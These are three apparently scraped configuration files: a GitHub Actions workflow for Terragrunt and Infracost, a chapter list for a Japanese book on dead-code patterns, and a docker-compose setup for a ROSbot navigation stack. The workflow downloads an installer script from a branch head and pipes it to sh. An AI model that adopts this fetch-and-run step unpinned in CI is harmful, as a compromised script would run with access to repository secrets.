- name: Setup Terragrunt
uses: autero1/action-terragrunt@v1.1.0
with:
terragrunt_version: latest
- name: Interact with Terragrunt
run: terragrunt --version
# - name: Run infracost diff
# uses: infracost/infracost-gh-action@master
# env:
# INFRACOST_API_KEY: ${{ secrets.INFRACOST_API_KEY }}
# GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
# with:
# path: dev/us-east-1/dev
# entrypoint: scripts/ci/diff.sh
- name: Plan Terragrunt
working-directory: dev/us-east-1/dev
run: terragrunt run-all plan
- name: Run Infracost
working-directory: dev/us-east-1/dev
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: |
# Downloads the CLI based on your OS/arch and puts it in /usr/local/bin
curl -fsSL https://raw.githubusercontent.com/infracost/infracost/master/scripts/install.sh | sh
./calculate_costs.sh
- name: Setup Node.js
uses: actions/setup-node@v1
with:
node-version: '14.17.5'
- name: Install dependencies
working-directory: .
run: npm install
- name: Release
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
run: npx semantic-release
|
.github/workflows/deploy_develop.yml
|
title: "DEAD CODE COOKBOOK"
summary: "☠️デッドコードクックブック☠️
~デッドコードの作り方と復活の呪文~
[デッドコードレシピ一覧]
1. 🔖中断を利用するパターン
1-1. 🧪return後のコード
1-2. 🧪throw後のコード
1-3. 🧪break後のコード
1-4. 🧪goto後のコード
1-5. 🧪exit後のコード
1-6. 🧪throwする関数呼出後のコード
1-7. 🧪breakするコールバック関数呼出後のコード
1-8. 🧪実行時エラーとなる処理後のコード
1-9. 🧪(条件がfalseとなる)assert後のコード
2. 🔖終らない処理を利用するパターン
2-1. 🧪無限ループ後のコード
2-2. 🧪終らない関数呼出後のコード
3. 🔖単独で常にfalseとなる条件を利用するパターン
3-1. 🧪単独で常にfalse(リテラル)となる条件のif文
3-2. 🧪単独で常にfalse(定数)となる条件のif文
3-3. 🧪単独で常にfalse(変数)となる条件のif文
3-4. 🧪単独で常にfalse(演算結果)となる条件のif文
4. 🔖並列な複数の条件を利用するパターン
4-1. 🧪部分集合条件のelseif
4-2. 🧪部分集合条件のcase(switch)
4-3. 🧪空集合条件のelse
4-4. 🧪空集合条件のdefault(switch)
5. 🔖ネストした複数の条件を利用するパターン
5-1. 🧪部分集合条件のif(ネスト)
6. 🔖if以外の条件を利用するパターン
6-1. 🧪for継続条件が空集合条件
6-2. 🧪while継続条件が空集合条件
6-3. 🧪三項演算子が空集合条件
6-4. 🧪短絡評価が空集合条件
6-5. 🧪catchすることのないcatch節
6-6. 🧪次要素のないイテレータ
6-7. 🧪常にnullに対するnull条件演算子
7. 🔖高階関数を利用するパターン
7-1. 🧪空集合要素に対する高階関数
7-2. 🧪余分な高階関数の引数
8. 🔖定義のみで使用されないパターン
8-1. 🧪定義のみの関数
8-2. 🧪定義のみのプライベートメソッド
8-3. 🧪オーバライドされたメソッド
9. 🔖その他のパターン
  9-1. 🧪1回しか実行されないジェネレータのyield後のコード
[レイズ一覧]
1. 👼中断コード削除
2. 👼ネスト修正による中断コードの移動
3. 👼関数修正
4. 👼関数呼出追加
5. 👼実行時エラー修正
6. 👼条件削除
7. 👼条件修正
[ゾンビ化一覧]
1. 🧟goto文のラベルによるジャンプ
2. 🧟ホイスティング
3. 🧟組込モジュールの上書き
4. 🧟組込モジュールの隠蔽
5. 🧟実行時除去
6. 🧟fallthrough
[デッドコードツール一覧]
1. 🔪終らない関数
2. 🔪比較演算子を用いた常に同じ真偽値となる演算
3. 🔪数値演算を用いた常に同じ真偽値となる演算
4. 🔪文字列を用いた常に同じ真偽値となる演算
5. 🔪正規表現を用いた常に同じ真偽値となる演算
6. 🔪空集合要素を作る演算
[付録]
1. 🛐供養
  2. 🧰対象言語と環境
"
topics: ["deadCode", "unreachableCode", "デッドコードクックブック", "デッドコードレシピ"]
published: true
price: 0
chapters:
- introduction
- index
- p_after
- r_after_return
- r_after_throw
- r_after_break
- r_after_goto
- r_after_exit
- r_after_func_throw
- r_after_yield_break
- r_after_runtime_error
- r_after_assert
- p_forever
- r_forever_loop
- r_forever_func
- p_simple_if
- r_simple_if_literal
- r_simple_if_const
- r_simple_if_variable
- r_simple_if_operation
- p_parallel_if
- r_parallel_elseif
- r_parallel_switch_case
- r_parallel_else
- r_parallel_switch_default
- p_nest_if
- r_nest_if
- p_cond_other
- r_cond_other_for
- r_cond_other_while
- r_cond_other_ternary
- r_cond_other_short_circuit
- r_cond_other_catch
- r_cond_other_iterator
- r_cond_other_null
- p_func
- r_func_empty
- r_func_arg
- p_def
- r_def_func
- r_def_method
- r_def_override
- p_other
- r_other_generator_yield
- a_after_stop_delete
- a_after_stop_move
- a_func_fix
- a_func_add
- a_runtime_error_fix
- z_goto
- z_hoisting
- z_builtin_override
- z_builtin_hide
- z_compile_delete
- z_fallthrough
- t_forever_func
- t_cond_comp
- t_cond_num
- t_cond_str
- t_cond_regex
- t_empty_set
- memorial
- environment
- afterword
|
books/dead-code-cookbook/config.yaml
|
version: "2.3"
services:
listener:
build:
context: .
dockerfile: Dockerfile.chatter
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: ros2 run demo_nodes_cpp listener
rplidar:
image: husarion/rplidar:galactic
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
devices:
- /dev/ttyUSB0
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: ros2 launch rplidar_ros2 rplidar_a3_launch.py
nav2:
image: husarion/nav2:galactic
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
command: >
ros2 launch husarion_nav2 navigation2_bringup.launch.py
use_slam:=True
use_auto_localization:=False
use_sim_time:=False
# ROS Noetic + ROS 2 Galactic
bridge:
# image: ros:galactic-ros1-bridge
build:
context: .
dockerfile: Dockerfile.ros1_bridge
restart: unless-stopped
network_mode: service:husarnet-rosbot
ipc: service:husarnet-rosbot
volumes:
- ./secret/dds-config.xml:/dds-config.xml
environment:
- FASTRTPS_DEFAULT_PROFILES_FILE=/dds-config.xml
# - RMW_FASTRTPS_PUBLICATION_MODE=SYNCHRONOUS
- ROS_MASTER_URI=http://ros-master:11311
command: ros2 run ros1_bridge dynamic_bridge --bridge-all-topics
# command: sleep 3600
# ROS Master (using custom port in case Master is already running on host OS)
ros-master:
image: ros:melodic-ros-core
restart: unless-stopped
command: stdbuf -o L roscore
# ROS Melodic rosbot hardware layer
rosbot:
image: husarion/rosbot
restart: unless-stopped
devices:
- /dev/ttyS4 # must match environment SERIAL_PORT
environment:
      - SERIAL_PORT=/dev/ttyS4 # default: ttyS1 - rosbot2.0; ttyS4 - rosbot2.0 pro
- ROS_MASTER_URI=http://ros-master:11311
command: roslaunch --wait rosbot_description rosbot_docker.launch
husarnet-rosbot:
image: husarnet/husarnet
ipc: shareable
restart: unless-stopped
volumes:
- /var/lib/husarnet
- ./secret/id_rosbot:/var/lib/husarnet/id
sysctls:
- net.ipv6.conf.all.disable_ipv6=0
- net.ipv6.ip6frag_time=3
- net.ipv6.ip6frag_high_thresh=134217728
cap_add:
- NET_ADMIN
devices:
- /dev/net/tun
environment:
- HOSTNAME=rosbot
- JOINCODE=${HUSARNET_JOINCODE}
|
all-in-one-husarnet-fastdds/compose.rosbot.yaml
|